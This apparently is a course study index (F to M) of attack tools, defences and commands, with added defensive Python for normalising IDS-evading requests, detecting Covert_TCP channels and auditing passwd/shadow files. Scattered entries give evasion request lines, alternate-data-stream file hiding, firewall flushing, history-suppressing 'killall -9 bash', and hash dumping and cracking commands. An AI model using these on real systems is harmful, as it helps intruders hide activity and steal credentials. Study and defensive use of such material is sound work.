Format String Attacks Misuse of printf, sprintf and snprintf; the attacker can read memory (%x) and overwrite it (%n)

Format string stack Input arguments are pushed on the stack in reverse order, so each %x walks up the stack one word at a time
Format string stack view Example of writing a value (eg 5) to an address (eg 0xbffffac0) with %n
Fortify Source Code Analyzer 3 127 Commercial code-analysis tool
Foundscan - McAfee's 2 119 Commercial Vulnerability scanner
Frag3 Snort preprocessor: multiple parallel virtual defragmentation buffers (one per target OS policy)
Fraggle Relies on UDP packets to launch a flood against a target; Smurf is the ICMP equivalent
Fragment Overlap Attack The 2nd fragment lies about its offset in order to overlap and replace part of the first fragment
Fragmentation problem for IDS The IDS doesn't know how the fragments will be reassembled; different OSes handle overlap differently
FragRoute Similar to Fragrouter but more flexible; includes a language for defining specific twisted fragmentation attacks. Difference: can route fragmented IP packets coming from a remote host
Fragrouter Tool with multiple ways to fragment packets; sits on the same machine as the attacker; cannot route
Fyodor (Nmap author) nmap -n -sP -o Smurf.log '209.12.*.63,127,191,255' (ping sweep of likely broadcast addresses to find Smurf amplifiers)
Gcat 5 133 C2 traffic over Gmail; bypass DLP/IDS/IPS/Firewalls

General Electric Comprehensive Operating Supervisor (GECOS) 4 36, 38 General info about the account owner: name, phone number, address etc (5th field of /etc/passwd)

Generate new file (Stego) The hidden message generates a new file; used in CGIs. Eg input text used to generate fractals
Generic Routing Encapsulation (GRE) 4 73 Some bots can send IP packets via GRE tunnels to infected systems, which forward the packets as if they originated from the victim
GET /./CGI-BIN/broken.cgi HTTP/1.0 Directory insertion (/./) - way Nikto avoids IDS
GET /%63%67%69%2d%62%69%6e/broken.cgi HTTP/1.0 URL encoding - way Nikto avoids IDS
GET /CGI-BIN/broken.cgi HTTP/1.0 Case sensitivity - way Nikto avoids an IDS signature that looks for the CGI exploit path in its exact case
GET / HTTP/1.0\r\n Premature URL ending - way Nikto avoids IDS: the reference to the CGI script is moved into a header
GET /index.htm?param=/../CGI-BIN/broken.cgi HTTP/1.0 Fake parameter - way Nikto avoids IDS
GET /URLlonger/../CGI-BIN/broken.cgi HTTP/1.0 Long URL formatting - way Nikto avoids IDS
GET \CGI-BIN/broken.cgi HTTP/1.0 Windows delimiter: use "\" instead of "/" - way Nikto avoids IDS
GET%00 /CGI-BIN/broken.cgi HTTP/1.0 NULL method - way Nikto avoids IDS
GET<tab>/CGI-BIN/broken.cgi<tab>HTTP/1.0 Tab separation - way Nikto avoids IDS
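The evasions above all target an IDS that string-matches the raw request. As an added example (not from the course material or from Nikto itself), the Python below constructs request lines for the evasions that can be resolved from the request line alone, shows that a naive substring signature misses every one of them, and normalizes the request (percent-decode, strip NULs from the method, backslash to slash, collapse /./ and /../ with posixpath.normpath, lower-case) so that a single rule catches them all. The request lines are constructed for illustration; the fake-parameter and header-based variants are left out of the match set because whether the server acts on them depends on the server, not on the request line.

```python
import posixpath
from urllib.parse import unquote

SIGNATURE = "/cgi-bin/broken.cgi"   # the naive IDS string, matched case-sensitively

# Constructed request lines reproducing the evasions listed above (not Nikto output).
EVASIONS = {
    "directory insertion": "GET /./CGI-BIN/broken.cgi HTTP/1.0",
    "url encoding":        "GET /%63%67%69%2d%62%69%6e/broken.cgi HTTP/1.0",
    "case":                "GET /CGI-BIN/broken.cgi HTTP/1.0",
    "long url":            "GET /URLlonger/../CGI-BIN/broken.cgi HTTP/1.0",
    "windows delimiter":   "GET \\CGI-BIN/broken.cgi HTTP/1.0",
    "null method":         "GET%00 /CGI-BIN/broken.cgi HTTP/1.0",
    "tab separation":      "GET\t/CGI-BIN/broken.cgi\tHTTP/1.0",
}


def naive_match(line):
    """What a plain substring signature sees: the raw bytes on the wire."""
    return SIGNATURE in line


def normalize_request_line(line):
    """Return (METHOD, canonical path) or None if the line is not a request line."""
    decoded = unquote(line.rstrip("\r\n"))   # %63 -> c, %2d -> -, %00 -> NUL
    parts = decoded.split()                   # any whitespace, so tabs separate fields too
    if len(parts) < 2:
        return None
    method = parts[0].replace("\x00", "").upper()
    target = parts[1].replace("\\", "/")      # Windows delimiter
    target = target.split("?", 1)[0]          # the query string is not part of the path
    if not target.startswith("/"):
        target = "/" + target
    target = posixpath.normpath(target).lower()   # collapses /./ and /x/../
    return method, target


def normalized_match(line):
    norm = normalize_request_line(line)
    return norm is not None and norm[1] == SIGNATURE
```

The fake-parameter request normalizes to ("GET", "/index.htm"): the CGI path only appears in the query string, so a normalized rule correctly does not fire on it and the detection question becomes whether this server interprets the parameter as a path. That is a server-behaviour question an IDS can only answer by knowing the target, which is the general lesson of these evasions.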
getCookie (XSS shell) Grabs the cookie of the page the victim's browser is currently visiting
getKeyloggerData (XSS shell) The XSS shell includes a keystroke logger
GetSelfHTML (XSS shell) Sends the HTML of the victim's browser's current page to the attacker
Getting access to systems (preparation) 1 34 Sometimes without the sysadmins; notify ops before logging in; only experienced IHs
getpid 3 161, 168 Check the process ID the Meterpreter session is currently running in
getuid 3 159 Check current User ID
GhostRAT 5 9 Application-level Trojan horse backdoor suite
Ghostwriting 3 143 modify the assembly of an exe to bypass AV
Golden tickets (MS Kerberos5 Pre-Auth) 4 25 Forged Kerberos5 TGTs; to invalidate them reset the krbtgt account password TWICE (the previous password is kept as a backup)

Google 2 35-36, 38-44 Good for recon; cache:www.counterhack.net; www.archive.org for the Wayback Machine (goes way back)

Google Hacking Database (GHDB) 2 35, 41 Index of search queries (dorks) used to find publicly available information
Google Maps API 2 36 Maps is good for location images
GrammaTech 3 127 Commercial code-analysis tool - C; C++


Gratuitous ARPs 3 49, 84 Sending ARP replies when nobody asked; used to flood a switch or poison ARP caches

grep 1 239-241, 254, 264, 266 Finds items matching a given condition, eg cd /etc; grep root * (find root in all files)
grep 3 71-76 -i: case-insensitive search; -B n / -A n: n lines before/after the match; eg netstat -nap | grep 777; ps aux | grep bash
grep 4 174, 183-188 -c: count the number of matching lines: [cmd] | grep -i -c [text]
grep 5 76-78, 95, 100, 141 lsof -Pi | grep 8080
Group Policy Object (GPO) 4 33 Used to push configuration and rules to users and computers on the network
GRR Rapid Response 1 39 IR framework focused on remote live forensics; waits until the system is back online; couples with Rekall
Hacktivism 2 10 Hacking to make a political point: website tampering, manipulating finance, remailers
Hashcat (password cracker) 4 10 Fast password cracker; uses CUDA (GPU) for faster cracking
hashdump and run hashdump (Meterpreter) 3 162 hashdump: dumps password hashes from memory (LSASS); run hashdump: dumps them from the registry (SAM)
hashdump and run hashdump (Meterpreter) 6 51 Metasploit commands
HBGary's fastdump 5 22 memory dump tool
HEADER: ../../cgi-bin/broken.cgi HTTP/1.0\r\n Premature URL ending - way Nikto avoids IDS: the reference to the CGI script is placed in a header
heartbeat 1 151 Interval at which a backdoor reconnects to get commands from the attacker
Heartbleed (Powerbleed tool) 3 65 Malformed TLS heartbeat requests bleed memory out of an SSL-enabled (OpenSSL) web server such as Apache
Hidden Unix files location 5 83 /tmp, /dev, /etc, /usr/src, /usr/local/man
Hidden Unix files location 2 5 82 Name files starting with ". ", ".. ", "... " or " " (a space)
Hiding Components in Linux 5 44 Hide files, processes, network usage and events by replacing ls, find, du, ps, top, killall; modify crontab
Hiding Files in NTFS (Windows) 5 104 type hackstuff.exe > notepad.exe:stream1.exe ; cp hackstuff.exe notepad.exe:stream1.exe (alternate data stream)
High Orbit Ion Cannon (HOIC) 4 169 Newer, by Anonymous; the JS booster can target more than one page; multithreaded; easy
Hijacking + Responder 3 79-86, 88
histogram A chart showing the frequency of each byte value in a file. Normal text is non-uniform; encrypted (or compressed) data has a flat histogram
HKEY_CURRENT_USER (HKCU) 1 69, 85

HKEY historical USB usage (when plugged in) 1 192 reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR

HKLM\System\CurrentControlSet\Control\Lsa\EveryoneIncludesAnonymous 0/1; Null sessions have no special rights / are part of the Everyone group
HKLM\System\CurrentControlSet\Control\Lsa\RestrictAnonymous 0/1; Null sessions can/can't enumerate shares
HKLM\System\CurrentControlSet\Control\Lsa\RestrictAnonymousSAM 0/1; Null sessions can/can't enumerate names
Hop Limit (IPv6 header field) 2 81, 83 Hop Limit in IPv6 is the equivalent of TTL in IPv4
Host Info (HINFO) 2 25 generated when NSLOOKUP uses set type=any
HTTP Flood 4 167 Bots complete the 3-way handshake and send GET requests: a huge volume of normal-looking traffic


Hunt Teaming 3 128 Using pen test techniques to hunt an attacker who may have used the same method
Human Interface Devices (HID) 2 74 Screenshot example; similar to Rubber Ducky
Human Interface Devices (HID) 3 5 USB sticks that act as keyboards: download and run malware, steal data…
Human Resources 1 170 Monitor a specific user only if a written request from HR is received
Hybrid Attacks 4 13, 27 "Word mangling": substitute characters in dictionary words, eg o=0, s=$, a=@
Hydan 5 148, 150-153 Hides data in Windows/Linux executables; the message is Blowfish-encrypted and embedded in the exe with no difference in size or function
Hydan Efficiency rate and detection Hides 1 byte per ~150 bytes; the normal distribution of equivalent instructions is altered, so it can be detected
Hydan How it works Encrypts the message and hides it using polymorphic coding techniques to rebuild the exe, eg A+B = A-(-B)
Hydan in action Rebuilds the exe from the ground up, switching ADD and SUB; the result is the same size
Hydan Uses Hide data, watermark, sign executables, polymorphic signature evasion (not yet)
Hydan 6 58 Commands to hide and retrieve data
Hydra Password guessing 4 8 Primarily dictionary-based (not a full brute-forcer); supports most protocols: RDP, SMB, HTTPS, SSH
ICMP 2 82 Echo Request: look for a response to identify live targets
ICMP 2 83 Time Exceeded message comes back if the TTL is too small
ICMP + Tunnel 5 120, 124-125, 131 Can carry shell traffic; ICMP messages can carry Covert_TCP data
ICMP Timestamp 2 82 Used for network mapping via Nmap
Identification 1 48-61 Goal: gather events,analyze and determine if we have an incident
Identification Where it occurs 1 53 Network Perimeter; Host Perimeter; System lvl; Application lvl

Identify Insider activity 1 176 Gather intel on systems, visited sites, FTP; monitor message boards; scanning and monitoring
iexplore.dll (rootkit hooking) 5 48 The rootkit injects it into explorer.exe to do API hooking
ifconfig (Linux) 1 232 Network config (IP, mask, MAC…); 2 interfaces: eth0 and lo
ifconfig (Linux) 2 72 ifconfig wlan0 hw ether [MACaddr]: change MAC address; ifconfig [interface] [IP_addr] netmask [netmask]: change IP in Linux
4 176 iptables -F (disable firewall)
5 7, 43-44 Kernel locations for Rootkits
IFRAME 4 147 Buffer overflow attempt on the browser; ZAP feature
IIS (Web server) 1 13 Log
IIS (Web server) 3 114 Metasploit exploitable
IIS (Web server) 4 57-58, 110, 124 Nimda exploitable; ModSecurity to defend from SQLi
Immunity Debugger 5 20 free Win debugger; reverse engineer malware and exploits
Inappropriate web access 1 170 HR makes the call; obtain signed authorization; maintain firm legal ground
Inception Attack tool to get access to encrypted HDDs of machines in suspend/hibernate state (DMA attack over FireWire/Thunderbolt)
Incident Definition 1 11 An action that results in harm or the threat of harm to a system or data; detect deviation from the norm; harm or attempt to harm
Incident Handling 1 10 Action plan for dealing with intrusions, cyber-theft, DoS etc; must be law compliant
Incident Handling importance Plan everything; without IH: legal jeopardy, PCI, industry standards
inetd.conf / xinetd.conf 2 104 Disable Linux services listening on ports; chkconfig is used to modify startup
initd 5 94-95, 99-100 Lab: shell history

Initial Sequence Number (ISN) 5 128-130 The ISN and the ACK number are used by TCP to order packets sent/received
Injection (Stego) The hidden data is ignored by the application and the file looks untampered when opened, eg hidden HTML, Word header

Insider threat 1 174 A threat from an entity with access to your data: employees and business partners; well-intentioned / disgruntled / unnoticed employee

Insider threat assessment checklist 1 177 Identify equipment, OS, IP, HTTP activity; IDS monitoring; email monitoring
Insider threat assessment checklist (2) 1 178 Monitor called numbers, background check, work habits, after-hours visits
Insider threat assessment checklist (3) 1 179 Review the data, summarize findings, interview the suspect
Insider threats - types Casual and intentional (destructive / non-destructive)
InSSIDer 2 61-62, 77 Used to discover SSIDs; doesn't help if cloaked, use Wellenreiter instead
Instruction Pointer 3 97-98, 104-105 The CPU uses the instruction pointer to point to the location in memory of the next instruction to execute
integrity-checking 5 67, 118, 155 Tripwire,OSSEC,AIDE
Intellectual property 1 181 The primary distinction between competitors, from brand to "secret formula"

Intellectual property cases 1 183 Prep: survey intellectual property. Iden: look for leaks and theft. Cont: criminal or civil case. Erad: remove infringing elements. Rec: rebrand/rebuild. Lessons: samples, watermarks
Intellectual property crown jewels 1 182 Patents, copyrights, trademarks/service marks, trade secrets
Internet Explorer 3 62 SSL warning msg - untrusted CA used
Internet Key Exchange (IKE) 4 26 CAIN crackable
Internet Relay Chat (IRC) 4 66, 68-69, 164, 168 Bot communication via TCP 6667
inurl:"ViewerFrame?Mode=" 2 37, 42 Search for web-accessible devices such as web cameras
Invisible Secrets 5 148 Stego tool- Hides data in banner ads that appear on websites
IP address spoofing Used to fool systems that filter based on IP: ACLs, firewalls, trust relationships; also used in DoS
IP address spoofing defense Pre: unpredictable sequence numbers, careful with trust relationships, don't authenticate by IP, anti-spoof filters, no source routing
IP address spoofing defense 2 Iden: anti-spoof filters and IDS logs. Con: filters, look for processes
IP address spoofing Flavor 1 - Change address Change the IP to anything you want: ifconfig / netsh interface ip set address
IP address spoofing Flavor 2 - Hack Unix trust ISNs are possibly predictable (1 at 10000); take the trusted host out of service with a DoS
IP address spoofing Flavor 2 - TCP Seq Nr guessing Attacker can take over a trust relationship by guessing the TCP sequence number
IP address spoofing with Seq Nr guessing DoS the original system so that it won't send a RST, keep guessing the ISN; one-way communication (the attacker never sees the replies)
IP Fragmentation Analysis frag 21223:1480@0+ (tcpdump notation: IP ID 21223, 1480 bytes at offset 0, more fragments follow)
IP Fragmentation Defense Pre: reassemble before making a decision, firewall, update IDS/IPS, HIPS/HIDS. Ide: IDS signature, IPS
IP Identification field 5 128 Covert_TCP can send information as ASCII data in the IP ID, the TCP ISN and the ACK sequence number
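As an added example (not from the course material or from Covert_TCP's own source), the Python below encodes and decodes a message one byte per packet in the IP ID field and in the TCP ISN, and implements the check a defender can run over the IP IDs of a flow. It assumes the original tool's convention of carrying the byte in the high-order byte of the field (IP ID = byte * 256, ISN = byte * 2^24); treat those multipliers as an assumption. Packets are represented as plain integers constructed in the block rather than real captures.

```python
# Assumption: one ASCII byte per packet, placed in the high-order byte of the field,
# following the Covert_TCP convention as understood here.
IPID_MULT = 256          # 16-bit IP ID: byte * 256
ISN_MULT = 1 << 24       # 32-bit sequence number: byte * 16777216


def encode_ipid(message: bytes):
    """IP ID values for a sequence of packets carrying the message."""
    return [b * IPID_MULT for b in message]


def decode_ipid(ip_ids):
    """Recover the message from the IP IDs of the received packets, in order."""
    return bytes((i // IPID_MULT) & 0xFF for i in ip_ids)


def encode_isn(message: bytes):
    """Initial sequence numbers carrying one byte each (SYN packets)."""
    return [b * ISN_MULT for b in message]


def decode_isn(isns):
    return bytes((s >> 24) & 0xFF for s in isns)


def suspicious_ipid_flow(ip_ids, min_packets=8):
    """Heuristic for the IP ID channel: a run of at least min_packets non-zero IP IDs
    whose low byte is always zero and whose high bytes all decode to printable ASCII.
    Ordinary stacks use incrementing or random IDs (or 0 with DF set), so this is unusual."""
    if len(ip_ids) < min_packets:
        return False
    if any(i == 0 or i % IPID_MULT != 0 for i in ip_ids):
        return False
    text = decode_ipid(ip_ids)
    return all(32 <= b < 127 or b in (9, 10, 13) for b in text)


# Constructed sample flows (not captured traffic).
COVERT_FLOW = encode_ipid(b"exfil: user=smith\n")
NORMAL_FLOW = [40001 + i for i in range(12)]   # incrementing IDs from an ordinary stack
```

The same low-byte-zero test applied to the top byte of the ISN catches the sequence-number variant; the ACK-number "bounce" mode is harder, because the bounce host's stack generates the ACK value and the defender sees only ordinary-looking SYN/ACKs from it.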
IP packet header 2 81 IPv4 and IPv6 header
IP Personality Tool that can make a Linux machine look like any other type of system to OS fingerprinting
iptables 1 203 iptables -F (disable the firewall by flushing all rules)
iptables 2 151 sudo ifconfig eth0 10.10.75.1 netmask 255.255.0.0
iptables 3 28 ifconfig eth0 10.10.75.1/16
iptables 6 8 Disable firewalls on Linux (+Windows)

IPv4 Header 2 MF, DF, IP ID, fragment offset; protocol field 06 = TCP


IRC to control Bots (TCP 6667) 4 68 Bots can be controlled with IRC; one-to-many comm
ISP Coordination 1 109 Can help identify, contain and recover from floods, botnets, worm/virus spam
ISR-Evilgrade 2 12 Undermines the auto-update process of software: Java plugins, Winamp, Mac OS X etc
ISS & Retina Commercial vulnerability scanners for networks
Jikto (runs browser scripts) 4 119 Performs a Nikto scan of internal websites using XSS functionality
Jizz DNS cache poisoning tool
job control (Linux) 1 228 bg, fg, jobs; use & after a command to run it straight in the background; fg 1 = bring the 1st job to the foreground
John Cracking modes 4 38 1. Single crack mode; 2. Wordlist mode (dictionary and hybrid); 3. Incremental/brute-force mode; 4. External mode
John The Ripper (cross-platform) 3 91-92
John The Ripper (cross-platform) 4 10, 35-41, 43-47 Linux: requires both /etc/passwd and /etc/shadow combined: # unshadow /etc/passwd /etc/shadow > combined; shadow file format; input & output (john.pot); PAM; lab
John The Ripper (cross-platform) 6 52 Short info
john.pot 4 39 stores cracked passes. Must be removed for audit
jolt (DoS tool) 4 161 Sends malformed packets to crash remote systems
Jsteg 5 148 Hides data in JPEG images using DCT
jump bag 1 40-47
Jump Bag (preparation) Binary image creation software (dd, netcat, SafeBack); forensic software (Sleuth Kit, EnCase, X-Ways)
Jump Bag - Additional items Phonebook, cell phone, extra batteries, plastic bags, notebooks, desiccants etc
Jump Bag - Additional items 2 Jumpers, flashlight, screwdrivers, tweezers, business cards etc
Jump Bag - Hardware USB token, 8 GB RAM, external HD, Ethernet tap, patch cables, laptop with multiple OSes, SSDs, VMs
Jump Bag - Investigative tools SIFT: VMware appliance that includes Sleuth Kit, log2timeline, Wireshark, Volatility etc

Kansa (detection tool) 1 140-144 Tool written in PowerShell; creates a stacked (long-tail) analysis of installed software in the environment to focus on processes of interest; uses PowerShell to pull info across many hosts and has good statistical tools
Karmetasploit 2 69-71 Listens for client probe requests, pretends to be the SSID, exploits with Metasploit; fake services: DHCP, DNS, POP3, web server; pretends to be an SMB server and captures your password hash
Kernel 5 51 Rings 0 and 3 in x86 architecture; user process -> system library -> CPU interrupt -> system call table -> kernel code
Kernel File on Hard Drive Modification 5 57 Overwrite the kernel file: vmlinuz (Linux); win32k.sys and ntoskrnl.exe (Windows); bypass ntldr
Kernel Loadable Modules & Device Drivers 5 55 Used in Linux to add new hardware support/features; the Windows equivalent is drivers; attacker creates a malicious driver
Kernel-mode rootkit 1 258 chkrootkit looks for anomalies on the system made by user-mode/kernel-mode rootkits
Kernel-mode rootkit 5 7, 50, 52-56, 58, 60-61, 64-65, 67-69, 82
Kernel Mode Rootkit Defenses 5 64 Pre: config lockdown (prevent attackers from getting root, harden the system, use a good security template); protect the syscall table
Kernel Mode Rootkit Defenses 2 Protect the syscall table: use systrace (tracks system calls), HIPS; some kernel versions don't export the syscall table

Kernel Mode Rootkits 5 52 Hide processes, files, network usage (TCP & UDP), promiscuous mode; execution redirection
Kernel Mode Rootkits Defenses 2 5 65-66 Ide: Linux: chkrootkit, rkhunter, OSSEC. Win: Sophos, McAfee, RootkitRevealer

Kernel Mode Rootkits Defenses 3 5 69 Con: analyze other changes made. Era: re-image, patch, change passwords. Rec: monitor
Kernel Modification - altering 5 53 Alter the syscall table: an evil wrapper for SYS_execve that runs another program or falls through to the legit SYS_execve
Kernel Modification in Memory 5 56 /dev/kmem in Linux is the file that exposes kernel memory space; Windows: system memory map
Kernel - Run Programs directly in Kernel mode KML tool: jump from ring 3 to ring 0; alter the syscall table and syscall code from a process
Kernel Virtualization 5 58 Imprison users in a VM without their knowledge
Keystroke logger 3 54, 118 MitMf uses module JSkeylogger ; Metasploit feature
kill / Disable Linux services 2 104 kill [pid]; killall [process_name]; edit inetd.conf; disable = yes in xinetd; chkconfig [svc_name] off
kill / Disable Windows services 2 102 taskmgr; wmic process where processid=[pid] delete; sc stop [service]; sc config [service] start= disabled
kill multiple processes 4 178 wmic process where name="calc.exe" delete
killall 1 260, 262, 266 # killall [process_name]
killall 4 184, 188 killall -9 [process_name]; -9 kills immediately, no questions asked
killall 5 44, 87, 138 killall -9 bash (kills all bash shells so they cannot write the most recent shell history to disk)
Kismet 2 61, 63 Looks for SSIDs in frames across the network; sniffs traffic, so cloaking can't stop it
Kismet 5 163-164 Linux tool to passively discover APs; sniffs traffic, cloaking can't stop it
Knocked - Non-Promiscuous Sniffing Backdoor Linux tool; supports more flags than cd00r (FIN, ACK, RST) to wake up the backdoor
KIS (Kernel Intrusion System) Communicates via UDP on random ports using a sniffer
Knark Listens on a port
Kon-Boot (USB boot) 3 4, 6 Bypasses auth controls by hijacking the password library to accept any password; Def: password-protect the BIOS and disable USB boot
Kon-Boot (USB boot) 4 29 Non-admin access
L0phtCrack Password Cracking for Windows
LADS 5 106, 111 Tool for finding alternate data streams in NTFS
land 4 161 DoS tool
LANMAN (weak password hash algorithm) 3 80, 157 Responder can downgrade auth to LANMAN
LANMAN (weak password hash algorithm) 4 16-21, 28, 47 Win NT/2000/XP/2003: a password of 14 chars or less is padded to 14, made UPPERCASE, then split into two 7-byte strings each used as a DES key; monk:1 monk:2
LANMAN auth disable 4 32 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa -> Edit, Add key "NoLMHash", OK; takes effect after the password is reset
LAN Turtle + Responder 3 4, 6 Mitigation against these attacks is to disable LLMNR
Last In First Out(LIFO) 3 99 Push things on top of stack; pop things out from top of stack
lastlog (/var/log/lastlog) 5 89-90 Login name,port,lastlog time for each user
Law Enforcement (LE) 1 97, 183 Ask the legal team before anything related to law enforcement; they must sign when taking evidence; criminal case workers
Layer Four Traceroute (LFT) Sends TCP/UDP packets through a packet-filtering device to determine which ports are open
Least Significant Bit (LSB) 5 154 Hides data from the human eye; discreet data hiding in stego (images/audio)
Legal system Regulatory, Criminal law, Civil law(Compensatory, punitive and Statutory)
Lessons Learned 1 114-115, 128-130 Within 2 weeks of resuming production; executive summary; keep it short and professional; document what happened and improve, don't blame; processes, technology, improved incident handling capabilities
less /dev or ls /dev | less 1 221 viewing output (less)
Lightweight Extensible Authentication Protocol (LEAP) 2 60, 64 Weak WiFi protection (WEP also)
Link-Local Multicast Name Resolution (LLMNR) 3 6, 50-51, 84 Fallback name-resolution system (if DNS fails); easily spoofed and the captured hashes are easy to crack; Def: disable

link:www.[target_company].com 2 29, 37 search on Google for all sites that link to the target

Linux file system structure 1 213 root, bin, sbin, dev, etc (passwd, shadow), home, lib, mnt, proc, tmp, usr (bin, sbin, man), var
Linux Password Cracking Defense 4 40 Password policy, guard the password file, strong passwords, use shadow passwords, use PAM, tokens, Kerberos
Linux Password File Format 4 36 Colon-separated: login name, encrypted password (x = in shadow), UID number, GID, GECOS info, home, shell
Linux Password Shadow File Format 4 37 login name, encrypted password, date of last change, min age, max age, warning days…
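As an added example (not from the course material or from John the Ripper), the Python below parses the two file formats above, joins them the way unshadow does (the hash from /etc/shadow replaces the x in /etc/passwd so John can read it), and audits the result for what an incident handler checks first: extra UID 0 accounts, empty password fields on accounts with a login shell, hashes left in the world-readable passwd file, and weak hash schemes ($1$ MD5-crypt as noted under MD5; the other prefixes are the standard crypt(3) ones). The sample files are constructed, with placeholder hashes, and are not taken from a real system.

```python
import re

# Constructed sample files for illustration only (placeholder hashes, not real accounts).
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
smith:x:1000:1000:Fred Smith,,555-0100:/home/smith:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
toor:x:0:0:maintenance:/root:/bin/bash
guest::1001:1001::/home/guest:/bin/sh
"""
SHADOW = """\
root:$6$saltsalt$hashhashhash:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
smith:$1$abcdefgh$ijklmnopqrstuvwxyz:19000:0:99999:7:::
backup:!:19000:0:99999:7:::
toor:$6$saltsalt$hashhashhash:19000:0:99999:7:::
guest::19000:0:99999:7:::
"""

PASSWD_FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")

# crypt(3) prefixes: $1$ is the MD5 scheme the page mentions; the rest are the other common ones.
HASH_TYPES = [
    (re.compile(r"^\$1\$"), "md5crypt"),
    (re.compile(r"^\$2[aby]\$"), "bcrypt"),
    (re.compile(r"^\$5\$"), "sha256crypt"),
    (re.compile(r"^\$6\$"), "sha512crypt"),
    (re.compile(r"^\$y\$"), "yescrypt"),
]


def parse_passwd(text):
    """Seven colon-separated fields per line, as described in the format entry above."""
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError("malformed passwd line: " + line)
        entries.append(dict(zip(PASSWD_FIELDS, fields)))
    return entries


def parse_shadow(text):
    """Only the first two shadow fields (name, hash) matter for cracking and auditing."""
    hashes = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, hash_field = line.split(":", 2)[:2]
        hashes[name] = hash_field
    return hashes


def hash_type(h):
    if h == "":
        return "empty"                      # no password required
    if h.startswith(("!", "*")):
        return "locked"                     # account disabled for password login
    for pattern, name in HASH_TYPES:
        if pattern.match(h):
            return name
    if len(h) == 13:
        return "descrypt"                   # traditional DES crypt, 8-char limit
    return "unknown"


def effective_hash(entry, shadow):
    """x in passwd means 'look in shadow'; anything else is the hash itself (or empty)."""
    return shadow.get(entry["name"], entry["passwd"]) if entry["passwd"] == "x" else entry["passwd"]


def unshadow(passwd_text, shadow_text):
    """Produce John-style input: passwd lines with the real hash in the 2nd field."""
    shadow = parse_shadow(shadow_text)
    out = []
    for e in parse_passwd(passwd_text):
        fields = [e["name"], effective_hash(e, shadow), e["uid"], e["gid"], e["gecos"], e["home"], e["shell"]]
        out.append(":".join(fields))
    return "\n".join(out) + "\n"


def audit(passwd_text, shadow_text):
    """Return (account, issue) pairs an incident handler should look at first."""
    findings = []
    shadow = parse_shadow(shadow_text)
    for e in parse_passwd(passwd_text):
        kind = hash_type(effective_hash(e, shadow))
        if e["uid"] == "0" and e["name"] != "root":
            findings.append((e["name"], "extra UID 0 account"))
        if kind == "empty" and not e["shell"].endswith("nologin"):
            findings.append((e["name"], "empty password with a login shell"))
        if kind in ("md5crypt", "descrypt"):
            findings.append((e["name"], "weak hash type " + kind))
        if e["passwd"] not in ("x", "", "*"):
            findings.append((e["name"], "hash stored in /etc/passwd instead of /etc/shadow"))
    return findings
```

The unshadow output is exactly what John's wordlist and incremental modes expect; the audit is the part to run before cracking, because a second UID 0 account or an empty password field is a finding on its own, with no cracking needed.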

LOKI (1) Symmetric-key block cipher designed as a DES replacement. (2) Covert channel tool: telnet over ICMP; can hide as DNS traffic using UDP port 53; carries a shell between a Linux client and server using ICMP Echo and Echo Reply
Log Editing in Windows 5 114 main event log files: System, Security, App
long-tail analysis (Kansa) 1 140 create stacked analysis of installed software in environment
Low Orbit Ion Cannon (LOIC) 4 168-169 Tool to launch various floods; Windows, Linux, Android, JavaScript version for the browser
ls 1 148, 155, 215, 217, 221, 262 -a (list all files including hidden); -d (list directory entries themselves, not their contents); -l (long listing format: permissions, links…); -r (reverse order); -s (list file size); -t (sort by time/date); eg ls -lrt, ls -la, ls /tmp, ls /dev | less, which ls, ls -a /tmp
ls 5 44 A rootkit can hide files by replacing ls
LSASS (Local Security Authority Subsystem Service) 4 16, 49, 50, 51, 53, 59 Interface that manages local security, domain authentication and AD processes; holds credentials in memory
LSASS (Local Security Authority Subsystem Service) 5 33

lsof (list open files) 1 234, 247, 250, 252, 260, 262-263 -i (all network connections); -p [pid] (all files and ports used by a running process); +L1 (unlinked files); -P (show port numbers, not names)
lsof (list open files) 5 100 lsof -Pi | grep 8080
lsof or netstat (Linux) 1 252 netstat -nap shows listening ports; lsof -i lists all network connections; lsof -p [pid] lists by process
lusrmgr.msc 1 71, 88 Users and groups; check for unusual accounts
MAC address 3 48 A MAC address is 48 bits (6 bytes); 00:50:56 / 00:0c:29 as the first 3 bytes (OUI) = VMware
MAC lab 3 70-77 MAC tables lab
Macof Floods a switch with bogus MAC addresses so it fails open and acts like a hub; manipulates the MAC-to-physical-port mapping
Maltego 2 46-48 Starting from a piece of information (eg a domain name) it applies the concept of transforms
Maltego Defenses Keep records up to date; conduct your own recon
Maltego Transforms DomainToPhone_whois, PersonToPerson_PGP, DomainToMXrecord_DNS
Malware Domain List (MDL) 1 134 Site with known bad actors to compare against the DNS cache
Malware layers 5 7 Application level, user-mode rootkits, kernel rootkits, boot sector, firmware, microcode
man & info (detailed usage info for commands) 1 242-243 man ls; info ls; man -k network (lookup by keyword)

Man-in-the-Middle Framework (MITMf) 3 51, 53-54, 68, 83 Supports ARP cache poisoning and multiple other injection/TCP stream modification attacks; backdoors EXEs in transit (FilePwn); ScreenShotter invokes HTML5 Canvas to screenshot the browser; SSLstrip+
Management Support (preparation) 1 29 Monthly report; show evidence of damage; show how others have been hacked
Mantech Responder 5 26 Analyzes memory dumps; compares malware with known samples
Masscan 2 97 Tool to scan very large networks with thousands of hosts, quickly

MD4 4 19 The NT hash (MD4 of the UTF-16LE password, unsalted) stored in the SAM


MD5 1 167, 251 Good idea to hash logs because they are perishable: md5sum
MD5 4 20 $1$ indicates that the password is hashed with MD5-crypt (Linux)
MD5 5 155 Helps identify stego (hash of the original vs the suspect file)
md5deep 1 43, 110 Create a hash of the original and of your image for the investigation
md5deep 2 13 Calculates MD5, SHA-1, SHA-256, Tiger, Whirlpool
Memory Analysis Tools 5 22 MemoryDD from Memoryze, fastdump, win32dd, Responder by Mantech, Volatility
MemoryDD.bat 5 22 Can generate a memory dump
Memoryze 5 22 Capture and analyze memory dumps on Windows
Metasploit 3 111-129, 137-138, 152-153, 155-159, 164-166, 168, 170-173 Exploit collection, payload collection, auxiliary modules and post modules
Metasploit 4 63, 76-77, 86 cd /home/tool/framework-x.x.x - navigate to Metasploit
Metasploit 6 51 Commands

